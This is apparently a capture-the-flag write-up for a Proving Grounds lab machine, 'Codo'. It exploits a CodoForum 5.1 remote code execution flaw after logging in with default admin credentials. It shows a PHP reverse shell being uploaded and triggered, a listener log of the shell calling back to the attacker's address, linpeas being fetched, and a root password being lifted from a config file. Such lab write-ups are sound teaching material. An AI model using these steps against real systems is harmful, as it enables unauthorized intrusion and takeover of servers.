Security Analyst | Security Researcher | CRTP

Proving grounds Play: Codo

Proving grounds Practice - Codo CTF writeup.

Nmap

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80/tcp open http - Apache httpd 2.4.41 ((Ubuntu))

http://192.168.211.23/

img

Directory Fuzzing

img

Login to the admin dashboard using credentials admin:admin.

img

Codoforum Current version: V.5.1.105

The version is vulnerable to CodoForum v5.1 - Remote Code Execution (RCE).

The exploit is not working properly so manual exploitation is necessarily required to obtain the initial foothold.

Initial Foothold

Code Explained

loginURL = options.target + '/admin/?page=login'
globalSettings = options.target + '/admin/index.php?page=config'
payloadURL = options.target + '/sites/default/assets/img/attachments/'
  • As per the code the user has to login as admin.
  • And navigate to /admin/index.php?page=config.
  • Upload reverse shell.
  • Trigger reverse shell at /sites/default/assets/img/attachments/ + uploaded_file_name.
    print("[*] Checking webshell status and executing...")
    payloadExec = session.get(payloadURL + randomFileName + '.php', proxies=proxy)

Upload pentest monkey PHP reverse shell.

img

Trigger reverse shell at.

http://192.168.211.23/sites/default/assets/img/attachments/shell.php.

listening on [any] 4444 ...
connect to [192.168.45.225] from (UNKNOWN) [192.168.211.23] 55984
Linux codo 5.4.0-150-generic #167-Ubuntu SMP Mon May 15 17:35:05 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
 14:02:20 up 19 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@codo:/$ 

Initial Foothold Obtained

Privilege Escalation

Download and run linpeas.sh.

The script will find the password configured in the PHP config files in the system.

╔══════════╣ Searching passwords in config PHP files
/var/www/html/sites/default/config.php:  'password' => 'FatPanda123',

Use the password to login to root.

www-data@codo:/tmp$ su root
su root
Password: FatPanda123

root@codo:/tmp# 

Root Obtained

Thanks for reading!

For more updates and insights, follow me on Twitter: @thevillagehacker.